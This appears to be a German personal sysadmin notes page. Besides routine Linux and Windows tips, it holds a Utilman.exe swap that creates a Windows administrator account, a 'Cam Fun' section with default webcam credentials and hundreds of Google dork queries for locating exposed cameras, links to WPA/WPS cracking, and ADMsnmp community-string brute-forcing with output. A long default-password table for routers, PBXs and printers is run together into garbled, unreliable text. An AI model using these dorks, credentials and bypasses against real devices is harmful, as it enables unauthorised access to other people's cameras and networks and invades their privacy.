GATEWAY=IP Gateway


Tunnel in Tunnel

ssh -p "SSH Port at Machine A" -l "your username at Machine A" -L 127.0.0.1:22222:127.0.0.1:444 "IPD/DNS of Machine A"

MAC Adressen Datenbank

iTunes Error 1015

Im Netz finden sich 1000 Lösungen zum Thema Error 1015.

Bei mir hat geholfen:

RecBoot 2.2

Abwesenheit auf UNIX Mailern

Abwesenheitsnachrichten auf Unixoiden Systemen

1: Im Homeverzeichnis .vacation.msg

Inhalt:


  From: blabla@earth.com
Subject: Re: $SUBJECT

I am on vacation until July 22.
If you have something urgent.. bla bla bla


2) .forward anlegen

Inhalt:

\blabla, "|/usr/bin/vacation -a mr.blabla blabla"

Erklärung:

blabla =  Loginname
mr.blabla = "user" part der email adresse


3) Darauf achten, das die Dateien auch dem jeweiligen Besitzer des
Homverzeivchnisses gehören!

chown ist dein Freund...

4) Löschen: .forward in _forward umbennen.. 

Der richtige UNIX Prompt

Man vi-e .profile, das da liege im HOME
export PS1="\u@\h \w \\$ "

DD Fortschritt

while /bin/true; do sudo kill -SIGUSR1 $(pidof dd); sleep 10; done

WLAN Bridge mit Linux

brctl addbr br0
brctl addif br0 eth0
brctl addif br0 eth1
ip link set br0 up
ip addr add 10.1.1.18/16 brd + dev br0
route add default gw 10.1.1.1 dev br0

NFS Infos

showmount -e xxx.xxx.xxx.xxx

mount -t nfs xxx.xxx.xxx.xxx:/share /mnt

Subnetz für Vergessliche

Netz
# Hosts
Netzmaske
/4
268435456
240.0.0.0
/5
134217728
248.0.0.0
/6
67108864
252.0.0.0
/7
33554432
254.0.0.0
/8
16777216
255.0.0.0
Class A
/9
8388608
255.128.0.0
/10
4194304
255.192.0.0
/11
2097152
255.224.0.0
/12
1048576
255.240.0.0
/13
524288
255.248.0.0
/14
262144
255.252.0.0
/15
131072
255.254.0.0
/16
65536
255.255.0.0
Class B
/17
32768
255.255.128.0
/18
16384
255.255.192.0
/19
8192
255.255.224.0
/20
4096
255.255.240.0
/21
2048
255.255.248.0
/22
1024
255.255.252.0
/23
512
255.255.254.0
/24
256
255.255.255.0
class C network
/25
128
255.255.255.128
/26
64
255.255.255.192
/27
32
255.255.255.224
/28
16
255.255.255.240
/29
8
255.255.255.248
/30
4
255.255.255.252
/31
2
255.255.255.254
/32
1
255.255.255.255
single IP address

Server 2008 Passwort change

Boot von Installations-DVD
-> "Computerreperaturoptionen“
-> "Eingabeaufforderung"

CD windows\system32 rename Utilman.exe Utilman.exe.bak copy cmd.exe Utilman.exe

--> Reboot (NICHT von DVD)

Anmeldebildschirm Button ganz unten links -> CMD Startet
Net user Username Userpasswort /add
Net localgroup „Administratoren“ Username /add
--> Reboot (VON DVD!)
C:
cd windows/system32
copy Utilman.exe.bak Utilman.exe -> Überschreiben bestätigen

ssh ID kopieren

ssh-copy-id -i ~/.ssh/id_rsa.pub user@remote-system
 
oder

cat ~/.ssh/*.pub | ssh user@remote-system 'umask 077; cat >>.ssh/authorized_keys'

Remote Desktop XP with Server 2008

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa “Security Packages”
-> Add Value Wert “tspkg”
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders “SecurityProviders”
-> Add Value “credssp.dll”
Reboot

Vuln Infos

Cam Fun

Here some links (not confirmed) to WebCam Interfaces



https://github.com/manuasir/insecure-cams/blob/master/allCameras.json




  • ACTi: admin/123456 or Admin/123456
  • American Dynamics: admin/admin or admin/9999 
  • Arecont Vision: none
  • Avigilon: admin/admin
  • Axis: Traditionally root/pass, new Axis cameras require password creation during first login
  • Basler: admin/admin
  • Bosch: none
  • Brickcom: admin/admin
  • Canon: root/camera
  • Cisco: No default password, requires creation during first login
  • Dahua: admin/admin
  • Digital Watchdog: admin/admin
  • DRS: admin/1234
  • DVTel: Admin/1234
  • DynaColor: Admin/1234
  • FLIR: admin/fliradmin
  • Foscam: admin/<blank>
  • GeoVision: admin/admin
  • Grandstream: admin/admin
  • Hikvision: Historically admin/12345, but firmware 5.3.0 and up requires unique password creation
  • Honeywell: admin/1234
  • Intellio: admin/admin
  • IQinVision: root/system
  • IPX-DDK: root/admin or root/Admin
  • JVC: admin/jvc
  • March Networks: admin/<blank>
  • Mobotix: admin/meinsm
  • Panasonic: admin/12345
  • Pelco Sarix: admin/admin
  • Pixord: admin/admin
  • Samsung Electronics: root/root or admin/4321
  • Samsung Techwin (old): admin/1111111
  • Samsung (new): Previously admin/4321, but new firmwares require unique password creation
  • Sanyo: admin/admin
  • Scallop: admin/password
  • Sentry360 (mini): admin/1234
  • Sentry360 (pro): none 
  • Sony: admin/admin
  • Speco: admin/1234
  • Stardot: admin/admin
  • Starvedia: admin/<blank>
  • Trendnet: admin/admin
  • Toshiba: root/ikwd
  • VideoIQ: supervisor/supervisor
  • Vivotek: root/<blank>
  • Ubiquiti: ubnt/ubnt
  • Wodsee: admin/<blank>
/home/homeJ.html

axis-cgi

“Live web imaging unleashed”

indexFrame.html axis

“Your browser has _JavaScript turned off.For the user interface to work effectively”

/view/view.shtml axis

inurl:axis-cgi/mjpg/video.swf

“TOSHIBA Network Camera - User Login”

axis-cgi/motion/motiondata.cgi

inurl:/view/viewer_index.shtml

inurl:/view/temp.shtml

“Live View is the default page”

inurl:appletvid.html

indexFrame.shtml?newstyle=Quad

intitle:”Live View / - AXIS”

cgistart?page=single

inurl:”viewerframe?mode=”

inurl:indexFrame.shtml “Axis Video Server”

inurl:”/view/index.shtml”

inurl:”axis-cgi/jpg”

inurl:lvappl

i-Catcher Console - Web Playback

cgi-bin/video.jpg?size=2

inurl:”video.mjpg”

inurl:”axis-cgi/mjpg”

/mjpg/video.mjpg

inurl:jpg/image.jpg?r=

inurl:mjpg/video.cgi

inurl:”video.cgi=” inurl:axis

inurl:”video.cgi?showlength=1”

inurl:”view/indexFrame.shtml”

inurl:”view/view.shtml”

inurl:”view/index.shtml”

inurl:”video.cgi?resolution=”

inurl:axiscam.net “AXIS”

inurl:axiscam.net “Live view”

inurl:axiscam.net intitle:Camera

“Your browser has JavaScript turned off.For the user interface to work effectively”

“Live web imaging unleashed”

“indexFrame.shtml?newstyle=Quad”

inurl:/demo/edu320x240s.shtml

intitle:”AXIS 240 Camera Server” intext:”server push” -help

inurl:axis-cgi/mjpg/video.swf

inurl:view/ptzFrame.shtml

“Welcome to the AXIS 200”

inurl:cgi-bin/push.html

intitle:”axis #Kameramodell#”

inurl:/fullsize.srvpushb

inurl:view/ctl.shtml

inurl:netw_tcp.shtml

inurl:/mpeg4/video.sdp

“MOBOTIX M1” and “open menu”

intext:”MOBOTIX D10” intext:”Open Menu”

(intext:”MOBOTIX M1” | intext:”MOBOTIX M10”) intext:”Open Menu” Shift-Reload

“Kamerainformationen anzeigen”

inurl:cgi-bin/guestimage.html

(intitle:MOBOTIX intitle:PDAS) | (intitle:MOBOTIX intitle:Seiten) | (inurl:/pda/index.html +camera)

inurl:control/userimage.html

inurl:/control/player

intitle:snc-cs10

intitle:snc-rz25

intitle:snc-rz30

intitle:”snc-rz30 home”

intitle:snc-z20 inurl:home/

intitle:snc-cs3 inurl:home/

intitle:snc-rz30 inurl:home/

intitle:”sony network camera snc-p1”

intitle:”sony network camera snc-m1”

inurl:home/homeJ.html

inurl:home/homeS.html

inurl:home/PViewer.html

intitle:”Sony SNT-V304 Video Network Station” inurl:hsrindex.shtml

site:miemasu.net

intitle:”TOSHIBA Network Camera - User Login”

inurl:/user_view_S.htm

inurl:/user/cgi-bin/view_M_t1.thtml

inurl:/user/cgi-bin/view_S_t_uF.thtml

inurl:/user_view_M.htm

Canon Webview netcams

inurl:sample/LvAppl/

inurl:LvAppl intitle:liveapplet

sample/LvAppl/

intitle:liveapplet

intitle:liveapplet inurl:LvAppl

inurl:sample/Others/SvrPush.htm

inurl:viewer/live/en/live.html

“CgiStart?page=Single”

inurl:CgiStart intitle:Camera

“ViewerFrame?Mode=”

inurl:ViewerFrame?Mode=Motion

site:.viewnetcam.com -www.viewnetcam.com

-inurl:htm -inurl:html inurl:ViewerFrame

“inurl:MultiCameraFrame?Mode=”

inurl:”*.viewnetcam.com”

allintitle:Network Camera NetworkCamera

intitle:start inurl:cgistart

inurl:/cam_portal.cgi

inurl:ap/wsmain.html

inurl:portal_main.html intitle:Panasonic

inurl:”S=320x240” | inurl:”S=160x120”

intitle:”Linksys Web Camera” “ver”

camera linksys inurl:main.cgi

inurl:next_file=main_fs.htm

inurl:main.cgi?next_file=v_video.htm

inurl:next_file=main.htm

inurl:next_file=main2.htm

intitle:Linksys site:ourlinksys.com

inurl:ViewerFrame?Mode=

inurl:ViewerFrame?Mode=Refresh

inurl:axis-cgi/jpg

inurl:axis-cgi/mjpg (motion-JPEG)

inurl:view/indexFrame.shtml

inurl:view/index.shtml

inurl:/img/vr.htm

intitle:”live view” intitle:axis

allintitle:”Network Camera NetworkCamera”

intitle:axis intitle:”video server”

intitle:liveapplet inurl:LvAppl

intitle:”EvoCam” inurl:”webcam.html”

intitle:”Live NetSnap Cam-Server feed”

intitle:”Live View / – AXIS”

intitle:”Live View / – AXIS 206M”

intitle:”Live View / – AXIS 206W”

intitle:”Live View / – AXIS 210″

inurl:indexFrame.shtml Axis

inurl:”MultiCameraFrame?Mode=Motion”

intitle:start inurl:cgistart

intitle:”WJ-NT104 Main Page”

intext:”MOBOTIX M1″ intext:”Open Menu”

intext:”MOBOTIX M10″ intext:”Open Menu”

intext:”MOBOTIX D10″ intext:”Open Menu”

intitle:snc-z20 inurl:home/

intitle:snc-cs3 inurl:home/

intitle:snc-rz30 inurl:home/

intitle:”sony network camera snc-p1″

intitle:”sony network camera snc-m1″

site:.viewnetcam.com -www.viewnetcam.com

intitle:”Toshiba Network Camera” user login

intitle:”netcam live image”

intitle:”i-Catcher Console – Web Monitor”

title:flexwatch intext:”Copyright by Seyeon TECH Co”

intext:”Copyright by Seyeon TECHCo”

intitle:flexwatch

inurl:/app/sample/ab1.asp

inurl:app/idxas.html

“Saving & Retrieving Mode”

intitle:flexwatch intext:”Home page ver”

inurl:toolam.html

inurl:viewash.html

allintitle:Brains

Corp. camera

inurl:camctrl.cgi

intitle:”WJ-NT104 Main”

intitle:”WJ-NT104 Main Page”

intitle:”WV-NP244”

inurl:getuid?PAGE= Camera

inurl:chconv?CH=

“(c)copyright 1999-2003 VICTOR COMPANY OF JAPAN

LIMITED. All rights reserved”

“V.Networks [Motion Picture(Java”

“Control the Pan/Tilt and move to the Preset Position”

“Powered by webcamXP”

intitle:my webcamXP server!

“powered by webcamXP” “Pro|Broadcast”

inurl:”pocketpc?camnum=1”

inurl:main/flashLogin.html

allinurl:top.htm?Currenttime

Configuration “Pop-up Live Image”

intitle:”NetCam Live Image”

Display Cameras intitle:”Express6 Live Image”

inurl:/login.ml intitle:User

inurl:/login.ml

“Webthru User Login”

“Please enter username and password to log in to system”

inurl:wg_main.ml

inurl:Ctl/index.htm?Cus

inurl:Remote/index.php3 intitle:Live Video

intitle:”supervisioncam protocol”

intitle:”Live NetSnap Cam-Server feed”

intitle:”i-Catcher Console - Web Monitor”

“please visit” intitle:”i-Catcher Console” Copyright “iCode Systems”

inurl:/main.cgi?next_file=index.htm “Gigaset”

inurl:/Aview.htm

inurl:/Jview.htm

inurl:/servlet/MoveRouter (on /servlet/Frames is the cam)

inurl:eyespyfx_large.jsp

intitle:”EyeSpyFX”

inurl:snap.html +intitle:”SiteCam”

intitle:”SiteCam Video Snapshot”

intitle:”SiteZAP WebCam Control”

inurl:TiVoConnect?Command=QueryServer

intitle:”QuickCamPro WebCam” inurl:webcam

intitle:”VisionGS Webcam Software”

intext:”Powered by VisionGS Webcam”

inurl:pictype=jpegserverpush

inurl:Camera.aspx?ServerID

inurl:”Pages/WebAccess.aspx” intitle:”Web Client”

intitle:”Orite IC301” | intitle:”ORITE Audio IP-Camera IC-301” -the -a

inurl:camstreams.com/asx.asp?user=

inurl:camstreams.com Live

inurl:dyndns intitle:Network Camera

inurl:dyndns.org inurl:index.shtml

inurl:dyndns.org Axis|Mobotix

intitle:”supervisioncam protocol”

intitle:”iVISTA.Main.Page”

intitle:”V-Gear BEE”

intitle:”IQeye302 | IQeye303 | IQeye601 | IQeye602 | IQeye603” intitle:”Live Images”

intitle:”Biromsoft WebCam” -4.0 -serial -ask -crack -software -a -the -build -download -v4 -3.01 -numrange:1-10000

inurl:”top.htm?Currenttime”

inurl:/goform/capture

inurl:Ctl/index.htm?Cus

inurl:live2.jsp?CID=

intitle:”::::: INTELLINET IP Camera Homepage :::::” OR inurl:/main_activex.asp OR inurl:/main_applet.asp

“Summary View of Sensors” | “sensorProbe8 v *” | “cameraProbe 3.0” -filetype:pdf -filetype:html

“Active Webcam Page” inurl:8080

inurl:webcam.asp

inurl:image?cachebust=

-inurl:htm -inurl:html inurl:webcam.php

netw_tcp.shtml

“/showcam.php?camid”

intitle:video server

intitle:”EvoCam” inurl:”webcam.html”

intitle:”netcam live image”

inurl view index.shtml

intitle:axis

intitle:axis camera

intitle:”Live View / - AXIS”

intitle:”Live View / - AXIS 206M”

intitle:”Live View / - AXIS 206W”

intitle:”Live View / - AXIS 210”

inurl:indexFrame.shtml “Axis Video Server”

inurl:”axis-cgi/mjpg”

inurl:”ViewerFrame?Mode=”

inurl:”ViewerFrame?Mode=Motion”

inurl:”view/index.shtml”

inurl:”MultiCameraFrame?Mode=”

inurl:”video.cgi=” inurl:axis

inurl:”video.cgi?showlength=1”

inurl:”view/indexFrame.shtml”

“axis-cgi/jpg”

“view/indexFrame.shtml”

“view/view.shtml”

“video.cgi?resolution=”

inurl:axiscam.net “AXIS”

inurl:axiscam.net “Live view”

inurl:mjpg/video.cgi

“MOBOTIX M1” and “open menu”

intext:”MOBOTIX M1”

intext:”MOBOTIX M1” intext:”Open Menu”

intext:”MOBOTIX M10” intext:”Open Menu”

intext:”MOBOTIX D10” intext:”Open Menu”

intext:”Open Menu”

intitle:snc-rz30

intitle:”snc-rz30 home”

intitle:snc-z20 inurl:home/

intitle:snc-cs3 inurl:home/

intitle:snc-rz30 inurl:home/

intitle:”sony network camera snc-p1”

intitle:”sony network camera snc-m1”

intitle:”TOSHIBA Network Camera - User Login”

intitle:toshiba inurl:user_single_view.htm

intitle:liveapplet inurl:LvAppl

“CgiStart?page=Single”

inurl:dyndns.org inurl:index.shtml

inurl:dyndns.org Axis|Mobotix

intitle:”Linksys Web Camera” “ver”

“Kamerainformationen anzeigen”

inurl:image?cachebust=

inintitle:”supervisioncam protocol”

title:flexwatch intext:”Copyright by Seyeon TECH Co”

inurl:LvAppl intitle:liveapplet

“Powered by webcamXP”

-inurl:htm -inurl:html inurl:ViewerFrame

-inurl:htm -inurl:html inurl:webcam.php

camera linksys inurl:main.cgi

Corp. camera

inurl:LvAppl intitle:liveapplet

“Powered by webcamXP”

intitle:flexwatch

intext:”Copyright by Seyeon TECHCo”

intitle:”WJ-NT104 Main”

intitle:”WJ-NT104 Main Page”

intitle:”WV-NP244”

sample/LvAppl/

inurl:home/homeJ.html

inurl:main/flashLogin.html

inurl:next_file=main_fs.htm

inurl:/login.ml

“Webthru User Login”

“Please enter username and password to log in to system”

inurl:Ctl/index.htm?Cus

Configuration “Pop-up Live Image”

inurl:”*.viewnetcam.com”

inurl:Remote/index.php3

intitle:Live Video

“ViewerFrame?Mode=”

liveapplet

“inurl:MultiCameraFrame?Mode=”

netw_tcp.shtml

“indexFrame.shtml?newstyle=Quad”

“/showcam.php?camid”

“image?cachebust=”

“live view”

intitle:liveapplet

allintitle:Network Camera NetworkCamera

intitle:video server

intitle:”supervisioncam protocol”

intitle:liveapplet inurl:LvAppl

intitle:”EvoCam” inurl:”webcam.html”

intitle:”Live NetSnap Cam-Server feed”

intitle:start inurl:cgistart

intitle:”netcam live image”

intitle:”i-Catcher Console - Web Monitor”

“V.Networks [Motion Picture(Java”

inurl:/app/idxas.html

Auto Network DM 800

mp3 -fstype=nfs,ro,soft,tcp,nolock,rsize=8192,wsize=8192 192.166.1.1:/mnt/md1/mp3
videos -fstype=nfs,ro,soft,tcp,nolock,rsize=8192,wsize=8192 192.166.1.1:/mnt/md1/videos
bilder -fstype=nfs,ro,soft,tcp,nolock,rsize=8192,wsize=8192 192.166.1.1:/mnt/md1/bilder

Finder entgrauen

xattr -d com.apple.FinderInfo /Pfad/Datei

Geek Stuff

Default Passwords

http://www.phenoelit-us.org/dpl/dpl.html
http://router-faq.de/index.php?id=router_ip_pw

http://forum.wifi4free.info/backtrack-netzwerk-anwendungen/privilege-escalation/protocol-analyses/network-sniffers/wireshark/154-wlan-router-nach-wps-einstellung-checken-mit-wireshark-netzwerk-analyzer/

https://www.wpacracker.com/#!/handshake

http://hintdesk.com/hacking-how-to-hack-wpawpa2-password-with-backtrack-through-cracking-wps/

http://www.wotan.cc/easybox_keygen.php
http://www.wardriving-forum.de/wiki/Standardpassw%C3%B6rter#Arcor_.2F_EasyBox_.2F_Vodafone

Ricoh Aficio - AP3800C

sysadmin password



- Admin access (HTTP)
Ricoh Aficio 2020D

admin password



- Admin access (HTTP)
Ricoh Aficio 2228c

sysadmin password



- Webpage admin
- Admin access (Multi)
Ricoh Aficio 2232C

n/a password



- Admin access (Telnet)
Ricoh Aficio 551

(none) sysadm



- Admin access (Multi)
Ricoh Aficio AP3800C - 2.17

(none) password



- alternative to sysadmin and Admin
- Admin access (HTTP)
Ricoh AP410N - 1.13

admin (none)



- Admin access (HTTP)
Ricoh - Aficio MP 3500 1.0

admin (none)



- Nabil OUCHN
- Admin access (Multi)




3COMOffice Connect ISDNRouters5x0 Telnet? n/a PASSWORD Admin3COMOfficeConnect ADSLWireless 11g FirewallRouter3CRWDR100-72 HTTP (none) admin Admin http://192.3COM 3CRADSL72 1.2Multi (none) 1234admin Admin snmp open3COM Internet Firewall 3C16770 HTTP admin password Admin3COM office connect 11g Multi admin (none) User3COM 3c16405 Multi n/a (none) Admin3COM superstack II Netbuilder 11.1Multi n/a (none) Admin3COM CoreBuilder 7000/6000/3500/2500 Telnet n/a admin Admin3COM cellplex 7000Multi admin admin Admin RS-232/tel3COM CoreBuilder 7000/6000/3500/2500 Telnet n/a (none) Admin3COM officeconnect Multi admin (none) Admin3COM 3C16405 Multi admin (none) Admin3COM 3CRWDR100A-72 2.06 (Sep 21 2005 14:24:48) HTTP admin 1234admin Admin Provided3COM Shark Fin Comcast-supplied HTTP User Password Diagnostics page 192.160.13M VOL-0215 etc. SNMP volition volition Admin for Volitio3ware 3DM HTTP Administrator 3ware AdminAcceleratedNetworksDSL CPE and DSLAM Telnet sysadm anicustACCTON Wirelessrouter T-online HTTP none 0Admin YEAHHaccton t-online accton Multi (none) 0Adminaccton t-online accton Multi (none) 0AdminAceex Modem ADSL Router HTTP admin (none) AdminAceex Modem ADSL Router HTTP admin (none) AdminActiontecWireless BroadbandRouterMulti admin password Admin Verizon FiADC Kentrox Pacesetter Router Telnet n/a secretAddon GWAR3000/ARM8100 HTTP admin admin Admin http://wwADIC Scalar 100/1000 HTTP admin secure AdminADIC Scalar i2000 Multi admin password AdminadtranTSU RouterModule/L128/L768/1.5Telnet n/a (none) Admin hit enter aadtran NxIQ Telnet n/a adtran Admin hit enter aadtran Express 5110/5200/5210 Telnet n/a adtran Admin hit enter aadtran Smart 16/16e Telnet n/a PASSWORD Admin hit enter aadtranAtlas800/800Plus/810Plus/550Telnet n/a Password Admin crtl-Ladtran TSU IQ/DSU IQ Telnet n/a (none) Admin hit enter aadtran Agent Card Telnet n/a ADTRAN Admin ctrl-PTTadtran T3SU 300 Telnet n/a adtran Admin Hit enter aadtran Smart 16/16e Telnet n/a (none) Admin hit enter aadtran MX2800 Telnet n/a adtran Admin hit enter aAdvantek NetworksWireless LAN 802.11 g/b Multi admin (none) Admin http://wwAethra Starbridge EU HTTP admin password AdminAirLink Airlink 101 (AR430W) HTTP Admin admin AdminAirTies RT-210 AirTies RT-210 AirTies RT-210 Telnet admin admin Admin AirTies RAlcatel PBX 4400Port 2533 dhs3mt dhs3mt unknown thanks toAlcatel Omnistack/omniswitch Telnet diag switch AdminAlcatel PBX 4400Port 2533 adfexc adfexc unknown thanks toAlcatel OmniPCX Office 4.1FTP ftp_admi kilo1987 AdminAlcatel PBX 4400Port 2533 mtch mtch unknown thanks toAlcatel Office 4200 Multi n/a 1064Admin by BazilleAlcatel OXO 1.3Multi (none) admin UserAlcatel PBX 4400Port 2533 install llatsni unknown thanks toAlcatel Timestep VPN 1520 3.00.026Permit configand consoleroot permit Admin Perm/ConAlcatel PBX 4400Port 2533 root letacla unknown thanks toAlcatel PBX 4400Port 2533 mtcl mtcl unknown thanks toAlcatel OmniPCX Office 4.1FTP ftp_oper help1954 OperatorAlcatel OmniPCX Office 4.1FTP ftp_inst pbxk1064 InstallerAlcatel PBX 4400Port 2533 client client unknownAlcatel OmniStack 6024 Telnet admin switch AdminAlcatel PBX 4400Port 2533 halt tlah unknown thanks toAlcatel Omnistack/Omniswitch Telnet/Console diag switch AdminAlcatel 7300 ASAM TL1 SUPERUSER ANS#150 AdminAlcatel PBX 4400Port 2533 kermit kermit unknown thanks toALCATEL 4400 Console mtcl (none) UserAlcatel PBX 4400Port 2533 at4400 at4400 unknown thanks toAlcatel PBX 4400Port 2533 dhs3pms dhs3pms unknown thanks toAlcatel OmniPCX Office 4.1FTP ftp_nmc tuxalize NMCAllied Telesyn Multi manager friend AdminAllied Telesyn AT-8024(GB) Console n/a admin AdminAllied Telesyn ALAT8326GB Multi manager manager Admin

Allied Telesyn AT-AR130 (U) -10 HTTP Manager friend Admin Default IPAllied Telesyn AT8016F Console manager friend AdminAllied Telesyn AT Router HTTP root (none) AdminAllied Telesyn AT-8024(GB) HTTP manager admin AdminAllnet ALL0275 802.11g AP 1.0.6 HTTP none admin AdminAllnet All0299 v.1.39.06 HTTP Admin admin AdminAllnet T-DSL Modem Software Version: v1.51 HTTP admin admin AdminAlteon AD4 9Console admin admin Admin Factory deAlteon ACEswitch 180e HTTP admin admin AdminAlteon ACEswitch 180e HTTP admin linga Admin noneAlteon ACEDirector3 console admin (none)Alteon ACEswitch 180e Telnet admin (none)AMBIT ADSL Telnet root (none) AdminAmbit ntl:home 200 2.67.1011 HTTP root root Admin This is theAmbit Cable Modem Multi root root Admin Time WarAmbit Cable Modem 60678eu 1.12Multi root root AdminAmitechwireless router and accesspoint 802.11g 802.11bany HTTP admin admin Admin Web interAndover Controls Infinity any Console acc acc Admin BuildingAOC zenworks 4.0 Multi n/a admin AdminApacheTomcat Web ServerAdministration Tool5HTTP admin (none) AdminAPCUPSes (Web/SNMPMgmt Card)HTTP device device Admin SecondaryAPCUSV Network Management CardSNMP n/a TENmanUFactOryPOWER Admin nachzulesAPC 9606 Smart Slot Telnet n/a backdoor AdminAPC Smart UPS Multi apc apc Adminapc Smartups 3000 HTTP apc apc Admin By Sentinapple airport5 1.0.09 Multi root admin Admin 192.168.1.AppleAirPort Base Station(Graphite)2Multi (none) public public See AppleAppleAirport Extreme BaseStation2Multi n/a admin Guest see AppleAppleAirport Base Station(Dual Ethernet)2Multi n/a password Guest See AppleAppliedInnovationsAIscout Multi scout scout supervisorAreca RAID controllers Console admin 0AdminArescom modem/router 10XX Telnet n/a atc123 AdminARtem ComPoint - CPD-XT-b CPD-XT-b Telnet (none) admin AdminAsante FM2008 Multi admin asante AdminAsante FM2008 Telnet superuser (none) AdminAsante IntraStack multi IntraStack Asante AdminAsante IntraSwitch multi IntraSwitch Asante AdminAscend Router Telnet n/a ascend AdminAscend Yurie Multi readonly lucenttech2Ascend Sahara Multi root ascendAscom Ascotel PBX ALL Multi (none) 3ascotel Admin no user reasmack router ar804u HTTP admin epicrouter AdminASMAX AR800C2 HTTP admin epicrouter AdminASMAX AR800C2 HTTP admin epicrouter AdminAsmax Ar-804u HTTP admin epicrouter AdminASMAXAR701u / ASMAXAR6024HTTP admin epicrouter AdminAspect ACD 6Oracle DTA TJM UserAspect ACD 8Oracle DTA TJM UserAspect ACD 6HTTP customer none User views erroAspect ACD 7Oracle DTA TJM UserASUSASUS WL-330 PocketWireless Access PointHTTP admin admin Admin http://192.ASUS WL-500G 1.7.5.6 HTTP admin admin AdminAsus wl300 All HTTP admin admin AdminAsus P5P800 Multi n/a admin UserAsus wl503g All HTTP admin admin AdminAsus wl500 All HTTP admin admin AdminASUS ASUS SMTA RouterFirmware: 3.5.1.3(C0.0.7.4) -Hardware: 1100(AVG6002REV:2.26A)HTTP + Telnet admin admin Admin Router / VAsus WL500g Deluxe HTTP admin admin Adminasus WL500g HTTP admin admin AdminATL P1000 Multi operator 1234User Tape LibrATL P1000 Multi Service 5678Service MaintenanceAdminTape LibrAtlantis A02-RA141 Multi admin atlantis AdminAtlantisI-Storm Lan RouterADSLMulti admin atlantis Admin (submit by

Avaya Definity G3Si Multi craft (none) AdminAvaya Pxxx 41761Multi manuf xxyyzz AdminAVAYA Cajun P33x firmware before 3.11.0 SNMP n/a admin Admin check theAvaya Pxxx 41761Multi diag danger AdminAVAYA P333 Telnet root ggdaseuaimhrke AdminAvaya Definity Multi dadmin dadmin01 AdminAvaya Cajun P550R P580 P880 and P882 Multi diag danger DeveloperAVAYA P333 Telnet Administrator ggdaseuaimhrke AdminAVAYA g3R v6 Console root ROOT500 AdminAvaya CMS Supervisor 11Console root cms500 AdminAvaya definity up to rev. 6 any craft crftpw AdminAvaya Cajun P550R P580 P880 and P882 Multi manuf xxyyzz DeveloperAvaya Cajun Pxxx Multi root root AdminAvocent CycladeLinux hostnamehere 2.6.11 #1 TueMar 28 13:31:20 PST 2006 ppcunknownMulti root tslinux Admin http://wwAxis 540/542 Print Server Multi root pass AdminAxis All Axis Printserver All Multi root pass AdminAxis NETCAM 200/240 root passAxis NETCAM 200/240 Telnet root pass Adminaxis 2100 Multi n/a (none) AdminAxis Webcams HTTP root pass AdminAXUS AXUS YOTTA Multi n/a 0Admin Storage Daztech DSL-600E HTTP admin admin AdminAztecj DSL 600EU 62.53.2 HTTP isp isp Admin backdoor -Aztecj DSL 600EU 62.53.2 Telnet root admin AdminBausch DatacomProxima PRI ADSLPSTN Router4 WirelessMulti admin epicrouter AdminBay Networks Router User (none) UserBay Networks Switch 350T n/a NetICs AdminBay Networks SuperStack II security security AdminBay Networks SuperStack II Telnet security security AdminBay Networks Router Telnet User (none) UserBay Networks Router Telnet Manager (none) AdminBay Networks Switch 350T Telnet n/a NetICs AdminBBR-4MG andBBR-4HGBUFFALO ALL HTTP root n/a AdminBeetel ADSL Modem 220X Multi admin password Admin Beetel MoBelkin F5D6130 SNMP (none) MiniAP Admin WirelessBelkin F5D7150 FB Multi n/a admin AdminBenq awl 700 wireless router 1.3.6 Beta-002 Multi admin admin AdminBillion Bipac 5100 HTTP admin admin AdminBillion BIPAC-640 AC 640AE100 HTTP (none) (none) AdminBinTec x1200 37834Multi admin bintec AdminBinTec x3200 37834Multi admin bintec AdminBinTec x2300i 37834Multi admin bintec AdminBinTec Bianca/Brick XM-5.1 SNMP n/a snmp-Trap read/write by rootkidBintec Bianka Routers Multi admin bintec AdminBlue CoatSystemsProxySG 3.x HTTP admin articon Admin access to cBluecoat ProxySG (all model) SGOS 3 / SGOS4 HTTPS (8082) admin admin AdminBMC Patrol 6Multi patrol patrol UserBMC Software Patrol all BMC unique Administrator the same all over Admin this defaulBreezecom Breezecom Adapters 3.x n/a Master AdminBreezecom Breezecom Adapters 4.x n/a SuperBreezecom Breezecom Adapters 2.x n/a laflaf AdminBreezecom Breezecom Adapters 4.4.x Console n/a Helpdesk AdminBreezecom Breezecom Adapters 2.x n/a laflaf Breezecom Breezecom Adapters 3.x n/a MasterBroadlogic XLT router Telnet admin admin AdminBroadlogic XLT router Telnet installer installer AdminBroadlogic XLT router HTTP webadmin webadmin AdminBrocade Fabric OS Multi admin password Admin Gigabit SBrocade Silkworm all Multi admin password Admin Also on otBrocade Fabric OS All Multi root fivranne Admin Gigiabit SBrother NC-3100h (none) accessnetwork boardaccessBrother NC-4100h (none) accessnetwork boardaccessBrother NC-2100p Multi (none) access Admin NC-2100pBrother HL5270DN HTTP admin access AdminBrother HL-1270n Multi n/a accessnetwork boardaccessBrother MFC-420CN Firmware Ver.C Multi n/a access Admin multifunctBUFFALOWLAR-L11-L / WLAR-L11G-LHTTP root (none) Admim

SNMP Infos

1.) nmap -A x.x.x.x
2.) sudo nmap -sU x.x.x.x
Tools for UDP scan:

sledgehammer: cd ~/Desktop/cisco-audit/ADMsnmp
sledgehammer:./ADMsnmp
ADMsnmp v 0.1 (c) The ADM crew
./ADMsnmp: [-g,-wordf,-out , [-waitf,-sleep, -manysend,-inter <#>] ]
: host to scan
[-guessname] : guess password with hostname
[-wordfile] : wordlist of password to try
[-outputfile] : output file
[-waitfor] : time in milisecond in each send of snmprequest
[-sleep] : time in second of the scan process life
[-manysend] : how many paket to send by request
[-inter] : time to wait in milisecond after each request
sledgehammer:~/Desktop/cisco-audit/ADMsnmp

ADMsnmp is a good tool for bruteforcing community names on SNMP enabled boxes.
sledgehammer:~/Desktop/cisco-audit/ADMsnmp
./ADMsnmp 127.0.0.1 -w snmp.passwd
ADMsnmp vbeta 0.1 (c) The ADM crew
ftp://ADM.isp.at/ADM/
greets: !ADM, el8.org, ansia
>>>>>>>>>>> get req name=1234 id = 2 >>>>>>>>>>>
>>>>>>>>>>> get req name=2read id = 5 >>>>>>>>>>>
>>>>>>>>>>> get req name=4changes id = 8 >>>>>>>>>>>
>>>>>>>>>>> get req name=CISCO id = 11 >>>>>>>>>>>
>>>>>>>>>>> get req name=IBM id = 14 >>>>>>>>>>>
>>>>>>>>>>> get req name=OrigEquipMfr id = 17 >>>>>>>>>>>
>>>>>>>>>>> get req name=SNMP id = 20 >>>>>>>>>>>
